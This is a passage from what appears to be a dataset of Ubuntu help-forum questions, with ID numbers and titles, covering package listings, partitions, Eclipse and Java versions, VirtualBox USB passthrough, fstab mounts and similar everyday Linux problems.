/opt/dhad/tv_bin/wine/share/wine/fonts/ssee1255.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssee1256.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssee1257.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssee874.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssef1255.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssef1256.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssef1257.fon /opt/dhad/tv_bin/wine/share/wine/fonts/ssef874.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sserife.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sserifee.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sserifeg.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sserifer.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sserifet.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sseriff.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sseriffe.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sseriffg.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sseriffr.fon /opt/dhad/tv_bin/wine/share/wine/fonts/sserifft.fon /opt/dhad/tv_bin/wine/share/wine/fonts/svgasys.fon /opt/dhad/tv_bin/wine/share/wine/fonts/symbol.ttf /opt/dhad/tv_bin/wine/share/wine/fonts/tahoma.ttf /opt/dhad/tv_bin/wine/share/wine/fonts/tahomabd.ttf /opt/dhad/tv_bin/wine/share/wine/fonts/vgas1255.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgas1256.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgas1257.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgas874.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgasys.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgasyse.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgasysg.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgasysr.fon /opt/dhad/tv_bin/wine/share/wine/fonts/vgasyst.fon /opt/dhad/tv_bin/wine/share/wine/generic.ppd /opt/dhad/tv_bin/wine/share/wine/l_intl.nls /opt/dhad/tv_bin/wine/share/wine/wine.inf /opt/dhad/tv_bin/xdg-utils /opt/dhad/tv_bin/xdg-utils/license /opt/dhad/tv_bin/xdg-utils/readme /opt/dhad/tv_bin/xdg-utils/xdg-desktop-icon /opt/dhad/tv_bin/xdg-utils/xdg-desktop-menu /opt/dhad/tv_bin/xdg-utils/xdg-email /opt/dhad/tv_bin/xdg-utils/xdg-icon-resource /opt/dhad/tv_bin/xdg-utils/xdg-mime /opt/dhad/tv_bin/xdg-utils/xdg-open /opt/dhad/tv_bin/xdg-utils/xdg-screensaver /opt/dhad/tv_bin/xdg-utils/xdg-settings /usr /usr/bin /usr/bin/viewer /var /var/log /var/log/viewer i want to filter only file paths : i try : rpm -qpl dhad-9.0.27891-2.x86_64.rpm | find -type f also : rpm -qpl dhad-9.0.27891-2.x86_64.rpm|grep -f also : rpm -qpl dhad-9.0.27891-2.x86_64.rpm |ls -f all did n't work .
484510	how to run ''top '' command 1 time and exit ?	is there any switch to tell top command in order to one time scan the system and do not monitor it all time ?
484519	lubuntu is not reading a partition of hard drive	i have windows 7 in my laptop . the windows 7 is installed in the primary hard disk ( which comes within the laptop ) . there are 4 partitions c : ( labeled as os ) , d : ( labeled as recovery ) , f : ( labeled as nothing ) , h : ( labeled as software ) . now when i am in lubuntu , it can read only the os and nothing . lubuntu is showing the path as /media/username/os and /media/username/nothing respectively . all the disk are in ntfs format . what to do so lubuntu can show software partition ? p.s : i installed lubuntu in external hard disk .
484521	upgrade xampp on trusty using upgrade tar	i have xampp 1.7.7 installed and running fine on trusty 14.04 . i want to upgrade this to a more recent version of xampp so that i will update php . http : //sourceforge.net/projects/xampp/files/xampp % 20linux/1.8.0/xampp-linux-upgrade-1.7.7-1.8.0.tar.gz/download looks to be the solution but i do not know how to use this to invoke the upgrade . not sure how i installed xampp to start with but the package upgrade does not seem to work . it is bound to be me . any help appreciated . david
484525	4in6 tunnel configuration	how to configure 4in6 tunnel in ubuntu12.04 ? i have read http : //tldp.org/howto/linux+ipv6-howto/x1373.html and configured accorading to provided steps on this site .
484526	ubuntu 14.04 using dropbox folder located in sdcard	i 'm using fstab to automount my dropbox folder located in an external sdcard by adding this line to it : uuid=dbfb-0730 /home/folder/dropbox vfat auto , users , uid=1000 , gid=1000 , utf8 , dmask=027 , fmask=137 0 0 sometimes , when the pc is booting everything goes smootly but many times it just hangs in the ubuntu splash screen and takes really long time . at this point if i eject the sdcard manually it notifies me that it 's unable to mount , giving the options to skip or do it manually . i already did this successfuly in the past in elementaryos using pysdm but i ca n't recall the exact line , so i guess is something wrong with that line in the fstab thanks
484532	xubuntu not showing taskbar and icons are grey	i install xubuntu a couple days ago and installed some packages . then last night , i installed docky and added a splash screen to xubuntu and then rebooted my system . now it does n't show docky or the taskbar . i can open my right click menu but programs do n't open .
484533	setting up a network	i am very new to ubuntu . i used to have a windows xp pc and now i am working with a ubuntu 12.04 laptop . i am trying to set up the office network and be able to use a wd my book live shared hard disk . i have no idea how to mount the hard disk .
484536	gcc related issue ( need to install latest version of gcc 4.9.0 )	i am using ubuntu 14.04 lts . i want to install latest version of gcc 4.9.0 . is it possible to uninstall default gcc compiler prepacked with os ? in this link , i read that uninstalling the default compiler may lead to stability issues since i am planning to install the latest version , will that cause stability issue ? and another problem is that in the official gnu gcc page , i read that gcc supports compiling of c++ programs . but i could n't compile a program using gcc . so , i used g++ . by using g++ instead of gcc , it gave an error stating that g++ is not installed . would n't ubuntu come along with g++ or is there any other config to use g++ with gcc ?
484537	bay trail z3740 and ubuntu issues , any help ?	i am having trouble to run ubuntu on my lg slidepad 2 with z3740 processor . the problem is that i ca n't find a way to boot the pendrive on it . i can get into the bios/uefi but there is no way i can boot the pen drive . i tried to follow the same procedures of asus t100 but it is n't the same , so it did n't work . is there any way i can boot up from the pendrive ?
484547	ca n't switch compliance level in eclipse	so after reading another question post i realized my question had changed . it is essentially , why ca n't i change my compliance level in eclipse from 1.6 to 1.7 but i 'm going to leave the body of my question as it was typed originally . this is a very specific question but i 'm going through a series of java courses online and one of the lessons deals with switch . the example code uses switch with strings ( both the course and i use eclipse ) . when i try to run the code it gives me an error stating '' can not switch on a value of type string for source level below 1.7 . only convertible int values or enum constants are permitted '' i understand this is because strings can only be used with switch in java 7 . thus i went about installing java 7 in terminal using some instructions i found online . afterwards eclipse would n't run at all . i went to switch back to java 6 and found i was running java 7 oracle but had option to change to java 7 openjdk so i did . eclipse is working again but i still get the same error as before . why is this ? and is there a way to fix it ? for some added info , here 's what terminal returns when i type in `` sudo update-alternatives -- config java '' to switch between versions . glitch @ glitch-inspiron-1720 : ~ $ sudo update-alternatives -- config java [ sudo ] password for glitch : there are 3 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/jvm/java-7-oracle/jre/bin/java 1062 auto mode 1 /usr/lib/jvm/java-6-openjdk-i386/jre/bin/java 1061 manual mode * 2 /usr/lib/jvm/java-7-openjdk-i386/jre/bin/java 1051 manual mode 3 /usr/lib/jvm/java-7-oracle/jre/bin/java 1062 manual mode press enter to keep the current choice [ * ] , or type selection number : '' as you can see i 'm currently using java-7-openjdk where as before i was using java-7-oracle ( which resulted in eclipse plain out not working ) and before that i assume i was using java-6-openjdk ( this is what i run minecraft in after all but who knows ) . more specifically i 'm using : glitch @ glitch-inspiron-1720 : ~ $ java -version java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1~0.12.04.2 ) openjdk server vm ( build 24.51-b03 , mixed mode ) i looked at this question : ca n't use java 7 from eclipse ? i tried following the instructions given therein all the way up to changing properties > java compiler > compliance level to 1.7 i found the location of my jvm was /usr/lib/jvm/ but when i put this in for jre home in eclipse it gives me this error : `` target is not a jdk root . java executable was not found '' i am quite frustrated . can anyone help ? also , please forgive my ignorance , i am very new at all this .
484548	no ldap in libre office 3.5 and 4.2	on a kubuntu 12.04 , i want to use an ldap server as data-source in libreo , but i can not find it in the list of possible connections . there is only : jdbc , oraclejdbc , thunderbird/icedove address book , tabledocument , dbase , text , mysql and odbc . i had installed libre office from this ppa : https : //launchpad.net/~libreoffice/+archive/libreoffice-4-2 . now , i used ppa-purge to remove the 4.2-version and reinstalled the libreoffice 3.5.7.2 build-id : 350m1 ( build:2 ) from the ubuntu-repository . and in this version , theres also no ldap-connection possible . but in the libreoffice help-files , it is listed as an option . can somebody please help me by telling me which version i have to install or how i have to install it . do i have to use the source-code , configure it with a specific parameter and compile it ? i would like to avoid compiling it . but i would compile it , if it 's unavoidable . : - ) thanks for any help . -messedupcoffeekid p.s : @ tohuwawohu : thanks for answering . you are right . that was an understanding-mistake of mine . but still that function to connect to a ldap-server as data-source exists besides jdbc etc. , it is listet in the libreoffice-help-files . edit . : i 've found a tutorial ( http : //www.linuxfromscratch.org/blfs/view/svn/xsoft/libreoffice.html ) ( for gentoo ) for compiling libreoffice . before compiling , you can use the autogen.sh to configure the program . and there is an option -- with-system-openldap . as desciption i found : ( if i understand correct ) if that parameter is added to the autogen.sh , the libreoffice will be using a version of openldap , alreday installed on the system instead of downloading a new one . why is libreoffice using openldap anyways ? is it the same as with the libldap , or is it a hint , that it may work with a compiled version to use adressbooks etc . from ldap-servers ? edit2 : well , as i unterstand now , it would at least work , if i add the respective ldap-server within evolution and use evolutionldap within libreoffice as database-choice . and i found out , that i had to install the .deb-package from the official libreoffice website instead of using the ppa for the availability of the evolution-ldap-database-connection . i will test an ldap-server this way soon and i will mark this thread as solved if it will work . -- messedupcoffeekid
484552	error while compiling opencv in ubuntu 14.04	i followed the instructions for compiling opencv2.4.9 from install opencv 2.4.9 in ubuntu 14.04 , 13.10 i am getting the following error during the build process . can someone point out to me how to fix it ? /usr/bin/ld : ../../lib/libopencv_highgui.a ( cap_libv4l.cpp.o ) : undefined reference to symbol 'v4l2_munmap' //usr/lib/x86_64-linux-gnu/libv4l2.so.0 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status make [ 2 ] : *** [ bin/opencv_test_highgui ] error 1 make [ 1 ] : *** [ modules/highgui/cmakefiles/opencv_test_highgui.dir/all ] error 2
484555	continue ubuntu 14.04 lts upgrade after stalled midway	i was tryin to upgrade my saucy salamander to trusty tahr today morning , but due to intermittent connection breaks on my network , the process failed . it was downloading the packages ( about 1500 completed from about 1875 packages ) . i restarted the update twice and both times the update process was stalled , which resulted in an error that it could not download the packages and the system would be restored to the original version . is there any way to continue the update process from where it left ( ie , 1500 out of 1875 packages ) and go on with the update ... ? i have restarted the update way too many times and the it would get stalled by the same network error , and i have lost my patience . i am only asking this because i have also updated windows 8 to 8.1 and no matter what sort of network break occurs , it would start from where it left ( ie , the amount of update files downloaded ) . many thanks in advance .
484561	what is etc/alternatives used for ?	what does /etc/alternatives stand for ? how and why is it used ? i found gnome-tex-editor in /usr/bin which is linked as follows : /usr/bin/gnome-text-editor - > /etc/alternatives/gnome-text-editor /etc/alternatives/gnome-text-editor - > /usr/bin/gedit so gedit and gnome-text-editor seem to be the same thing . so why are some commands ( e.g . : gedit and gnome-text-editor ) provided twice ? and what is the use of /etc/alternatives/ - how does it work ?
484562	expand wubi ubuntu disk size from windows 7	i have installed ubuntu with wubi . at startup , both options appear . now , i have win7 with some 10 gb free and ubuntu with almost 1 gb or less . i simply want to expand the root.disk size . how can i do that ? edit : someone provided this code , i do n't know if i can expand the size inside ubuntu ( i mean , booting with ubuntu at startup and from in there ) and i have sensible information that i wouldn ' like to lose if i fail to execute this steps . that 's why i would prefer expanding the disk size from win7 and not from ubuntu , but if it is safe , i can do it also : sudo dd if=/dev/zero bs=1mib of=/host/ubuntu/disks/root.disk conv=notrunc oflag=append count=2048 sudo losetup -c /dev/loop0/ sudo resize2fs /dev/loop0
484565	what is holding my usb device when i try to use it in virtualbox ?	ubuntu host , xp guest . when i connect the usb device i want to the virtual machine , i get : failed to attach the usb device microchip technology inc. picdem fs usb demo board ( c ) 2004 to the virtual machine develxp . failed to create a proxy device for the usb device . ( error : verr_read_error ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 8ab7c520-2442-4b66-8d74-4ff1e195d2b6 } $ lsusb bus 002 device 029 : id 04d8:000c microchip technology , inc. $ cat /etc/udev/rules.d/90-picdem.rules subsystems== '' usb '' , attrs { idvendor } == '' 04d8 '' , attrs { idproduct } == '' 000c '' , group= '' plugdev '' , mode= '' 660 '' ( i also tried without this file , no change ) $ grep dargaud /etc/group : plugdev : x:46 : dargaud vboxusers : x:124 : dargaud $ dmesg [ 103413.447464 ] usb 2-1.3 : new full-speed usb device number 29 using ehci-pci [ 103413.549055 ] usb 2-1.3 : new usb device found , idvendor=04d8 , idproduct=000c [ 103413.549063 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 103413.549068 ] usb 2-1.3 : product : picdem fs usb demo board ( c ) 2004 [ 103413.549072 ] usb 2-1.3 : manufacturer : microchip technology inc. $ vboxmanage list usbhost host usb devices : uuid : fbd0bac3-f283-46bc-9632-603471a932cb vendorid : 0x04d8 ( 04d8 ) productid : 0x000c ( 000c ) revision : 0.0 ( 0000 ) port : 2 usb version/speed : 2/1 manufacturer : microchip technology inc . product : picdem fs usb demo board ( c ) 2004 address : sysfs : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3//device : /dev/vboxusb/002/029 current state : held why is it being held ? what is holding it ? note : other custom usb cards work fine . this one is old though , so could it be a usb1/1.1/2 issue ? i disabled usb 2.0 ehci temporarily in my vm , but no change . more info : $ sudo udevadm info -q path -n /dev/bus/usb/002/029 /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 $ sudo udevadm info -a -p /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices . it prints for every device found , all possible attributes in the udev rules key format . a rule to match , can be composed by the attributes of the device and the attributes from one single parent device . looking at device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 ' : kernel== '' 2-1.3 '' subsystem== '' usb '' driver== '' usb '' attr { bdevicesubclass } == '' 00 '' attr { bdeviceprotocol } == '' 00 '' attr { devpath } == '' 1.3 '' attr { idvendor } == '' 04d8 '' attr { speed } == '' 12 '' attr { bnuminterfaces } == '' 1 '' attr { bconfigurationvalue } == '' 1 '' attr { bmaxpacketsize0 } == '' 8 '' attr { busnum } == '' 2 '' attr { devnum } == '' 29 '' attr { configuration } == '' '' attr { bmaxpower } == '' 100ma '' attr { authorized } == '' 1 '' attr { bmattributes } == '' 80 '' attr { bnumconfigurations } == '' 1 '' attr { maxchild } == '' 0 '' attr { bcddevice } == '' 0000 '' attr { avoid_reset_quirk } == '' 0 '' attr { quirks } == '' 0x8 '' attr { version } == '' 2.00 '' attr { urbnum } == '' 18 '' attr { ltm_capable } == '' no '' attr { manufacturer } == '' microchip technology inc. '' attr { removable } == '' removable '' attr { idproduct } == '' 000c '' attr { bdeviceclass } == '' 00 '' attr { product } == '' picdem fs usb demo board ( c ) 2004 '' looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1 ' : kernels== '' 2-1 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 01 '' attrs { devpath } == '' 1 '' attrs { idvendor } == '' 8087 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 2 '' attrs { devnum } == '' 2 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 0ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 8 '' attrs { bcddevice } == '' 0000 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 660 '' attrs { ltm_capable } == '' no '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0020 '' attrs { bdeviceclass } == '' 09 '' looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2 ' : kernels== '' usb2 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 0 '' attrs { idvendor } == '' 1d6b '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { authorized_default } == '' 1 '' attrs { busnum } == '' 2 '' attrs { devnum } == '' 1 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 0ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' e0 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 3 '' attrs { bcddevice } == '' 0313 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' 0000:00:1d.0 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 26 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' linux 3.13.0-29-generic ehci_hcd '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 0002 '' attrs { bdeviceclass } == '' 09 '' attrs { product } == '' ehci host controller '' looking at parent device '/devices/pci0000:00/0000:00:1d.0 ' : kernels== '' 0000:00:1d.0 '' subsystems== '' pci '' drivers== '' ehci-pci '' attrs { irq } == '' 17 '' attrs { subsystem_vendor } == '' 0x1028 '' attrs { broken_parity_status } == '' 0 '' attrs { class } == '' 0x0c0320 '' attrs { companion } == '' '' attrs { enabled } == '' 1 '' attrs { consistent_dma_mask_bits } == '' 32 '' attrs { dma_mask_bits } == '' 32 '' attrs { local_cpus } == '' 00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000000f '' attrs { device } == '' 0x3b34 '' attrs { uframe_periodic_max } == '' 100 '' attrs { msi_bus } == '' '' attrs { local_cpulist } == '' 0-3 '' attrs { vendor } == '' 0x8086 '' attrs { subsystem_device } == '' 0x040a '' attrs { numa_node } == '' -1 '' attrs { d3cold_allowed } == '' 1 '' looking at parent device '/devices/pci0000:00 ' : kernels== '' pci0000:00 '' subsystems== '' '' drivers== '' '' $ vboxmanage showvminfo develxp -- details name : develxp groups : / guest os : windows xp ( 32 bit ) uuid : 79b38fbb-d0d5-4b78-9ee4-944050e4b4b8 config file : /home/dargaud/.virtualbox/machines/develxp/develxp.vbox snapshot folder : /home/dargaud/.virtualbox/machines/develxp/snapshots log folder : /home/dargaud/.virtualbox/machines/develxp/logs hardware uuid : 79b38fbb-d0d5-4b78-9ee4-944050e4b4b8 memory size : 2048mb page fusion : off vram size : 64mb cpu exec cap : 100 % hpet : off chipset : piix3 firmware : bios number of cpus : 2 pae : off long mode : on synthetic cpu : off cpuid overrides : none boot menu mode : message and menu boot device ( 1 ) : dvd boot device ( 2 ) : harddisk boot device ( 3 ) : not assigned boot device ( 4 ) : not assigned acpi : on ioapic : on time offset : 0ms rtc : local time hardw . virt.ext : on nested paging : on large pages : off vt-x vpid : on vt-x unr . exec . : on state : running ( since 2014-06-17t12:43:14.761000000 ) monitor count : 1 3d acceleration : off 2d video acceleration : on teleporter enabled : off teleporter port : 0 teleporter address : teleporter password : tracing enabled : off allow tracing to access vm : off tracing configuration : autostart enabled : off autostart delay : 0 default frontend : storage controller name ( 0 ) : ide controller storage controller type ( 0 ) : piix4 storage controller instance number ( 0 ) : 0 storage controller max port count ( 0 ) : 2 storage controller port count ( 0 ) : 2 storage controller bootable ( 0 ) : on ide controller ( 0 , 0 ) : /home/dargaud/.virtualbox/harddisks/xp.vdi ( uuid : 93969496-17bb-46c2-9e56-a7c24b6e05f4 ) ide controller ( 1 , 0 ) : empty nic 1 : mac : 080027a62fa1 , attachment : nat , cable connected : on , trace : off ( file : none ) , type : am79c973 , reported speed : 0 mbps , boot priority : 0 , promisc policy : deny , bandwidth group : none nic 1 settings : mtu : 0 , socket ( send : 64 , receive : 64 ) , tcp window ( send:64 , receive : 64 ) nic 2 : disabled nic 3 : disabled nic 4 : disabled nic 5 : disabled nic 6 : disabled nic 7 : disabled nic 8 : disabled pointing device : ps/2 mouse keyboard device : ps/2 keyboard uart 1 : disabled uart 2 : disabled lpt 1 : disabled lpt 2 : disabled audio : enabled ( driver : alsa , controller : ac97 ) clipboard mode : bidirectional drag'n'drop mode : disabled session type : gui/qt video mode : 1680x1050x32 at 0,0 vrde : disabled usb : enabled ehci : enabled usb device filters : index : 0 active : no name : jmicron usb to ata/atapi bridge [ 0100 ] vendorid : 152d productid : 2338 revision : 0100 manufacturer : jmicron product : usb to ata/atapi bridge remote : 0 serial number : 43527262060a index : 1 active : yes name : cypress vendorid : 04b4 productid : 8613 revision : manufacturer : product : remote : 0 serial number : index : 2 active : no name : broadcom corp 5880 [ 0101 ] vendorid : 0a5c productid : 5800 revision : 0101 manufacturer : broadcom corp product : 5880 remote : 0 serial number : 0123456789abcd index : 3 active : yes name : microchip technology inc. picdem fs usb demo board ( c ) 2004 vendorid : 04d8 productid : 000c revision : 0000 manufacturer : microchip technology inc . product : picdem fs usb demo board ( c ) 2004 remote : serial number : available remote usb devices : < none > currently attached usb devices : < none > bandwidth groups : < none > shared folders : name : 'dargaud ' , host path : '/home/dargaud ' ( machine mapping ) , writable name : 'lpscdata ' , host path : '/informatique/dargaud ' ( machine mapping ) , writable name : 'd620 ' , host path : '/d620 ' ( machine mapping ) , writable name : 'tmp ' , host path : '/tmp ' ( machine mapping ) , writable vrde connection : not active clients so far : 0 video capturing : not active capture screens : 0 capture file : /home/dargaud/.virtualbox/machines/develxp/develxp.webm capture dimensions : 1024x768 capture rate : 512 kbps capture fps : 25 guest : configured memory balloon size : 0 mb os type : windowsxp additions run level : 3 additions version : 4.2.18 r88780 guest facilities : facility `` virtualbox base driver '' : active/running ( last update : 2014/06/17 12:43:25 utc ) facility `` virtualbox system service '' : active/running ( last update : 2014/06/17 12:44:01 utc ) facility `` virtualbox desktop integration '' : active/running ( last update : 2014/06/17 12:44:23 utc ) facility `` seamless mode '' : active/running ( last update : 2014/06/17 12:43:25 utc ) facility `` graphics mode '' : active/running ( last update : 2014/06/17 12:43:25 utc )
484567	how to copy a flash usb content to a folder in my hard drive	i want to copy all the files and folders in my flash usb to a folder in my hard drive . my usb drive is /dev/sdb can i use the dd command and how ?
484568	add another linux to dual boot	i need to know exactly how to add a new disrto to a windows 7 dual boot . i am using 2 hard drives and one grub bootloader [ not using bios ] was told to just add / of the 3rd distro in a resized partition . when i did the 3rd distro worked fine but the ubuntu that was up and running fine before would n't load because it could n't find /home . this ca n't be that difficult . i am just missing something .
484569	how can i fix “setenv command not found ” error ? ( ubuntu 12.04.4 )	i use ubuntu 12.04.4 . i install tcsh . but i still see this error : no command 'setenv ' found , did you mean : command 'netenv ' from package 'netenv ' ( universe ) setenv : command not found how can i fix it ?
484570	why does my wine-installed program get frequently unavailable ?	i have installed and run a windows compatible video converter ( mediacoder ) successfully via wine . however , the converter frequently becomes unavailable and requires re-installation . most probably , though i am not yet absolutely sure , this happens after running the anti-virus program , clamtk , and quarantining the detected threats . can anyone throw light on this problem and suggest a remedy ?
484574	live dvd crashes	when i try 14.04 from a live dvd within seconds of the desktop stabilising it crashes to a pattern of coloured diagonal lines without any action from me . i have re-downloaded and burned the dvd several times and it is quite consistent . is this a `` funny '' with the live dvd , or will installed 14.04 also crash ? asrock alivenf6g amd dual core 64 bit 1 g ram .
484578	can i customize the password prompt window/box ( to perform administrative tasks ) ?	can i customize ( change colors , the shape ) the windows/boxes , that are shown below : where those settings stored in css ?
484580	xfce notification area printer icon does not respond	i have ubuntu 14.04 with the xubuntu ( xfce ) desktop . when i print something , the printer icon appears in the notification area in the panel . but the printer icon does not respond to anything . i try to left-click or right-click : nothing . i remember a similar bug one or two ubuntu versions ago with the volume control , and i even installed a patch , which made the volume control icon responsive again . so , how to get the printer icon to respond to clicking ?
484582	installing ubuntu on laptop without a preinstalled os ?	( i 've looked around the site and found only a few questions that could potentially be relevant , most of them downvoted and unclear , or involving computers that previously had an os . sorry if this is considered a dupe . ) if i get a brand new laptop without any preinstalled os , and i wish to install ubuntu ( and no other os ) on it , is the installation process any different from installing alongside windows ? most importantly , what partitioning , if any , would the computer ship with ? i have installed ubuntu alongside windows 7 ( though not with uefi ) before , and i can burn the iso to a dvd from that computer . it 's just the actual installation that i 'm asking about . the possibly relevant specs of the computer i want to install ubuntu on are as follows : acer aspire e1-531g intel pentium 2020m 2.4ghz dualcore processor 8gb ram 750gb hdd has dvd drive
484584	burning atmega32 using usbasb	how to burn atmega32 using usbasb . i am using atmega 32 for my project . i an using ubuntu for many years but it is now one of the big problem for me . can we directly use terminal to burn atmega32 and which program can be used to create hex file .
484586	encrypted dvd not plaing ubuntu 14.04	in ubuntu 12.04 -all dvds were working . after clean upgrade to 14.04 lts - encrypted dvds are not working ( with vlc and videos ) but non-encrypted dvds are working . all suggested `` restricted extras '' , region code were installed - still not working . any video from video shop - not playing . please help as i 'm not an expert ( all i can do is highlight and paste to terminal ) ? ?
484593	is there any command to show how much time your ubuntu is on ?	is there any command which tells you , how much times you turn on your ubuntu ? for example in 8 am you turn on ubuntu and at 10 am you write that command and the result is two hours ?
484595	i want to use tomcat6 but eclipse wants tomcat7	i 'm using xubuntu 14.04 in a chroot to run a development environment . or , well , i 'm trying to . for the development i need to do i need to use tomcat 6 but i need to also use eclipse . unfortunately installing eclipse followed by libtomcat6 forces eclipse to uninstall . installing libtomcat6 and then eclipse forces eclipse to uninstall and libtomcat7 to install . i 'm not really sure if there 's a way around this , but i 'm betting there is . any help is appreciated . more precisely here 's an in depth look at what happens : currently tomcat 6 is installed , eclipse is not , ( oracle ) java is . when trying to install eclipse apt-get does n't look for the proper new packages to install : eclipse : depends : eclipse-jdt ( > = 3.8.1-5.1 ) but it is not going to be installed depends : eclipse-pde ( > = 3.8.1-5.1 ) but it is not going to be installed so i manually add eclipse-jdt and eclipse-pde , they depend on something , continue this until i get to : the following packages have unmet dependencies : eclipse-platform-data : depends : libtomcat7-java but it is not going to be installed so , add that , and ... the following packages will be removed : libtomcat6-java tomcat6 tomcat6-common
484599	print only the first match once	i have a code snippet that i am using to parse through a log file and print information i need . for i in $ ( cat ~/jlog/ '' $ 2 '' ) ; do grep `` $ 1 '' ~/jlog/ '' $ 2 '' | awk '/\ ( [ a-za-z0-9 . ] +/ { print $ 7 } ' done ; the problem is when i enter input in , it displays the answer multiple times : ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.284.3.17454802.933.1401109176.280.1 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.284.3.17454802.933.1401109176.283.1 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.80.977011700.14346.1401109696.2 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.80.977011700.14346.1401109706.51 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.80.977011700.14346.1401109758.100 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.80.977011700.14346.1401109773.149 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.80.977011700.14346.1401109810.198 ) ( 1.3.51.0.1.1.10.10.30.48.2084865.2084839/1.2.840.113619.2.80.977011700.14346.1401109818.247 ) is there any way i can trim this so i can only have the first series of data display once . i only need 1.3.51.0.1.1.10.10.30.48.2084865.2084839 to print out once . i tried to change it to this as well , but bash does not like it : for i in $ ( cat ~/jlog/ '' $ 2 '' ) ; do grep `` $ 1 '' ~/jlog/ '' $ 2 '' | awk '/\ ( [ a-za-z0-9 . ] +/ ' | awk -f ' [ ( / ] ' ' { print $ 2 , exit } ' done ; then tried this : for i in $ ( cat ~/jlog/ '' $ 2 '' ) ; do grep `` $ 1 '' ~/jlog/ '' $ 2 '' | awk -f ' [ ( / ] ' '/\ ( [ a-za-z0-9 . ] +/ { print $ 2 , exit } ' done ;
484600	changing url for phpmyadmin	when i install phpmyadmin apt-get install phpmyadmin to access it i have to write the following address format http : //123.123.123.123/phpmyadmin assuming that was the ip address of my server . but what if i want to use a subdomain , for instance http : //phpmyadmin.dbugger.com how should i configure/modify the configuration files in apache , so that it would work ?
484601	sftp clients add whitespaces to uploaded directories ( 12.04 )	ubuntu 12.04 i have several offsite users uploading files via sftp . they 're using mac clients transmit and cyberduck and both programs seem to add whitespaces at the end of the directories they upload . the problem with this is it turns a filename like : mf5806 dont mess with texas red white blue 2014 tee v3 to this when viewed locally over smb : mq2fah~y this makes the files completely unsearchable when viewed this way . i can see the correct filename when i look at them myself over the lan and sftp in transmit , even delete the offending character and the filename is corrected . what is causing this issue ? how can i correct it ? would this have anything to do with the ext4 disk ? **edit : i 'm seeing that this is exclusive to smb viewing these files on my mac because when i checked for the file with ls i found the file titled exactly correct , uncorrupted , with the whitespace at the end .
